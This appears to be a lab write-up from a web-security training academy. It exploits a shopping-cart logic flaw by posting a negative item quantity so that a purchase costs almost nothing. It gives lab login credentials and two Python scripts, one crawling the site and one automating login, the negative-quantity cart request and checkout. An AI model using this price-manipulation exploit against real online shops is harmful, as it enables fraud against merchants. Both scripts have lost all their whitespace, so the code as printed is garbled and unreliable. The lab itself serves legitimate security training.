Access the lab, add the domain to Burp’s Target scope and check Include subdomains. View / route source page and inspect the page, then request all embedded links via Burp proxy using the script below.
frombs4importBeautifulSoupfromurllib.parseimporturljoinimportrequestsimporturllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# Specify Variablesbase_url="https://0ae4008f04bfe75680e04e27000900d8.web-security-academy.net"proxies={'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}# Parse Base URLcontent=BeautifulSoup(requests.get(base_url).text,'html.parser')# Find and Request all href resourceforlinkincontent.find_all('a',href=True):full_url=urljoin(base_url,link['href'])response=requests.get(full_url,proxies=proxies,verify=False)print(f"{response.status_code}{response.url}")# Find and Request all src resourceforimgincontent.find_all('img',src=True):full_url=urljoin(base_url,img['src'])response=requests.get(full_url,proxies=proxies,verify=False)print(f"{response.status_code}{response.url}")
Exploration
Stacking BurpSuite and the Browser with FoxyProxy extension for Burp turned on, perform a user flow for purchasing an item after logging in with the provided user credential wiener:peter. The /login when requested with valid credentials makes a POST request with csrf, username and password parameters.
Exploitation
Observe a POST request to /cart with productId,redir, and quantity parameters. When the cart is viewed a GET request is made to /cart which returns an ensuing page with a coupon feature that has a csrf input tag and a form tag that makes a POST request to /cart/checkout to place an order for the item. The subtlety here is that the price is hard-coded and can’t be changed but the item quantity can. Typically the total price of item is calculated by multiplying the price and quantity, hence we exploit the quantity parameter with a negative value. Add two items to cart and view the cart, then send these requests to Burp Repeater and manipulate the quantity of the second item to gravely reduce the price of the first item and then purchase the desired item. This exploit can be automated with the script below
frombs4importBeautifulSoupfromurllib.parseimporturljoinimportrequestsimporturllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# Define Variablesbase_url='https://0ae4008f04bfe75680e04e27000900d8.web-security-academy.net/'proxies={'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}# Get CSRF Tokendefget_csrf_token(session,url):response=session.get(url,proxies=proxies,verify=False)csrf_token=BeautifulSoup(response.text,'html.parser').find('input',{'name':'csrf'}).get('value')returncsrf_token# Purchase Itemdefpurchase_item(session,url):# Loginlogin_url=urljoin(base_url,'login')login_csrf_token=get_csrf_token(session,login_url)login_payload={'username':'wiener','password':'peter','csrf':login_csrf_token}login_response=session.post(login_url,data=login_payload,proxies=proxies,verify=False)iflogin_response.status_code==200:# Add first itemcart_url=urljoin(base_url,'cart')cart_payload1={'productId':'1','redir':'PRODUCT','quantity':'1'}session.post(cart_url,data=cart_payload1,proxies=proxies,verify=False)# Add second itemcart_payload2={'productId':'2','redir':'PRODUCT','quantity':'-16'}session.post(cart_url,data=cart_payload2,proxies=proxies,verify=False)# Checkoutcheckout_url=urljoin(base_url,'cart/checkout')checkout_csrf_token=get_csrf_token(session,cart_url)checkout_payload={'csrf':checkout_csrf_token}checkout_response=session.post(checkout_url,data=checkout_payload,proxies=proxies,verify=False)ifcheckout_response.status_code==200:print("Purchase successful!")else:print("Failed to checkout.")else:print("Failed to log in.")defmain():session=requests.Session()purchase_item(session,base_url)if__name__=="__main__":main()